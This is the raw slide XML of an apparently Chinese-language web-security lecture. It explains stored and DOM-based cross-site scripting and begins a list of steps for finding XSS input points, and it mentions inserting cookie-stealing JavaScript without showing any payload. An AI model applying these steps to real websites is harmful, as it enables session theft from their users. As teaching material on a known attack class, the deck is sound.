            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>在插入盗取</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码后，重新加载留言页</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>面，</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码在浏览器中 执</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>行</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906654" y="2314746"/>
            <a:ext cx="3175000"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25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>攻击者将带有</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码的留言提交到数据库，当用户查看这段留言</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>时</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，浏览器会</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044583" y="2391708"/>
            <a:ext cx="3036570"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把</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码看作是正常的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>代码来执行。因</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>此</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，存储</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>具有更高的隐</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1044579" y="2468670"/>
            <a:ext cx="285750"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蔽</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>性</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="900315" y="1239647"/>
            <a:ext cx="3574541" cy="291084"/>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308487" y="1115896"/>
            <a:ext cx="1470660" cy="245110"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">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5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>-DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262767" y="1373417"/>
            <a:ext cx="3358515" cy="238125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="15240" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="825"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="120"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DOM-based</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </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漏洞是基于文档对象模型的一种漏洞，它是通过修改页面的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130">
              <a:lnSpc>
                <a:spcPts val="825"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>节点而形成的。</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </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也是一种反射型。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1838591" y="1691640"/>
            <a:ext cx="1927860" cy="1163573"/>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2547499" y="2934751"/>
            <a:ext cx="611505" cy="124460"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="12065" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="650">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DO</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5">
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="650" spc="-5" b="1">
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>整体结构</a:t>
            </a:r>
            <a:endParaRPr sz="650">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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5"/>
            <a:ext cx="3348990" cy="572135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="93980" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="58419">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="7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类型</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>-DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="380"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="151765" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DO</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>是代表文档的意</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>思</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，而基</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>于</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DO</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>型的</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是不需要与服务器端交互</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，它只 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>发生在客户端处理数据的阶</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>段</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。下面给出一段经典</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>型</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示</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>例</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715397" y="2264195"/>
            <a:ext cx="3354704" cy="23812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上述代码的意思是获取</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中</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>con</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>ent</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>参数的值并输出，如果输入下面的代</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>码</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，就 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>会产生</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t> </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漏</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>洞</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298841" y="1658112"/>
            <a:ext cx="1978914" cy="611123"/>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817257" y="2589275"/>
            <a:ext cx="3361944" cy="311658"/>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621993"/>
            <a:ext cx="1426845"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查找</a:t>
            </a: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漏洞过程</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1262767" y="832223"/>
            <a:ext cx="3357879" cy="862330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="62865" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="495"/>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1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>在目标站点上找到输入点，比如查询接口、留言板等。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="405"/>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2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
